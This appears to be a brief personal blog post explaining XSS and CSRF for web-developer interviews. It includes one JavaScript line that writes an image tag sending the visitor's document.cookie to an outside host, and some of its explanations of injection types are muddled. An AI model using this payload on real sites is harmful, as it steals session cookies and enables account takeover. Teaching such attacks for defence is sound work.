When you go for interview for the post of Sr. Web Developer at that you must know about the security issues and latest technology news. I failed to give answer of such issues but then I realised that I must know about these issues.
Simply becoming master in coding does not mean that you are a good programmer. You can not ignore security issues.
1. Active Injection:
document.write(‘<img src = “http://mysite.com/code.php?params=’ + document.cookie + ‘”>’);
in this sample we will passing logged member cookies to another website
Blogs users are allowed to add images. HTML enabled view of editing blog enables user to add code like
Such code makes possible to send the secrete and critical information to the hacker’s site.
2. Passive Injection:
This injection can be done with site search functionality. Exclaimed??? Yes. When one search for something on site at that search result comes and format of result like
Search result for “Happy Porter” or
Did you mean “Happy Porter”
Passive Injection is more dangerous because it is only single time execution and site admin does not have any track for it.
XSS / CSRF attacks are generally performed in 4 phases:
Phase 1 : Injection phase
Image: Phases of CSRF
Phase 2 : Code obtention phase
Phase 3 and 4: Code execution
During these phases, the browser execute the Code. Usually, the first step consists to retrieve the session cookie, then the second, to send a forged request to the web site. The request will be granted by the Web server because of the session cookies
So while coding always keep these points in your mind.
A Good Programmer’s must provide strong shield against Hackers.
God Bless Programmers
/2 a j a /7 ‘/. /2 a w a /
(Rajan Y. Rawal)